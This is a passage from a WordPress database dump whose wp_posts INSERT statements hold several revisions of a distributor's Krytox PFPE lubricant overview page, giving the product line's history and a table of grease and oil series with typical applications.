conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of <a href="https://www.chemours.com/">The Chemours Company</a> FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-16 15:33:32', '2016-11-16 15:33:32', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3047, 2, '2016-11-16 15:34:02', '2016-11-16 15:34:02', '<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of <a href="https://www.chemours.com/">The Chemours Company</a> FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-16 15:34:02', '2016-11-16 15:34:02', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3048, 2, '2016-11-16 15:37:20', '2016-11-16 15:37:20', '<h3>Krytox High Performance Greases &amp; Oils Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a 